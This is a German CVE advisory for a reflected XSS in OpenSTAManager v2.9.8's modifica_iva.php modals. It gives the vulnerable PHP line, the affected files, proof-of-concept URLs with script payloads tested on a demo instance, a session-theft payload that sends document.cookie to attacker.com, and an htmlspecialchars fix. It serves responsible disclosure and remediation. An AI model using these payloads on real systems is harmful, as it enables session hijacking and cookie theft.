
CVE-2026-24415 - OpenSTAManager von XSS in modifica_iva.php über den Parameter righe betroffen
| Feld | Details |
|---|---|
| CVE-ID | CVE-2026-24415 |
| Schweregrad | MEDIUM |
| Advisory | Advisory ansehen |
| Entdeckt von | Lukasz Rybak |
Mehrere Reflected-Cross-Site-Scripting-Schwachstellen (XSS) in OpenSTAManager v2.9.8 ermöglichen es nicht authentifizierten Angreifern, über manipulierte URL-Parameter beliebigen JavaScript-Code im Kontext der Browser anderer Benutzer auszuführen, was potenziell zu Session-Hijacking, Diebstahl von Anmeldedaten und unbefugten Aktionen führen kann.
Angreifbarer Parameter: righe (GET)
OpenSTAManager v2.9.8 enthält mehrere Reflected-XSS-Schwachstellen in den Modaldialogen zur Bearbeitung von Rechnungen/Bestellungen/Verträgen. Die Anwendung bereinigt die vom Benutzer bereitgestellten Eingaben aus dem GET-Parameter righe nicht ordnungsgemäß, bevor sie in der HTML-Ausgabe reflektiert werden.
Angreifbare Code-Stelle:
Datei: /modules/contratti/modals/modifica_iva.php (Zeile 125)
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">
Der Parameter $_GET['righe'] wird ohne jegliche Bereinigung mithilfe von htmlspecialchars() oder gleichwertigen Funktionen direkt in das HTML-value-Attribut ausgegeben. Dadurch kann ein Angreifer den Attributkontext verlassen und beliebiges HTML/JavaScript injizieren.
Alle betroffenen Dateien:
/modules/contratti/modals/modifica_iva.php - Zeile 125, Zeile 167/modules/preventivi/modals/modifica_iva.php - Zeile 125, Zeile 167/modules/fatture/modals/modifica_iva.php - Zeile 121, Zeile 161/modules/ddt/modals/modifica_iva.php - Zeile 125, Zeile 167/modules/ordini/modals/modifica_iva.php - Zeile 125, Zeile 167/modules/interventi/modals/modifica_iva.php - Zeile 125, Zeile 167Voraussetzungen:
Schritt 1: Anmelden
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
Schritt 2: XSS auslösen Navigieren Sie in einem Browser zu folgender URL (oder verwenden Sie curl mit Cookies):
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>
Getestete URLs (alle angreifbar):
https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>Erwartetes Ergebnis: Ein JavaScript-Alert-Popup zeigt das aktuelle Session-Cookie an und bestätigt damit die Codeausführung.
HTML-Ausgabe (auf Live-Instanz verifiziert):
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">
Verifizierung:
Alternative Payloads:
Session-Diebstahl: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>
Betroffene Benutzer: Alle authentifizierten Benutzer mit Zugriff auf die Module für Verträge, Rechnungen, Angebote oder Bestellungen.
Angriffsszenario:
Empfohlener Fix:
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">
Wenden Sie diesen Fix auf alle betroffenen Dateien an, die im Abschnitt „Details" aufgeführt sind.
Diese CVE wurde verantwortungsvoll und im Rahmen koordinierter Offenlegung (Coordinated Vulnerability Disclosure) gemeldet. Die hier bereitgestellten Informationen dienen ausschließlich Bildungs- und Verteidigungszwecken.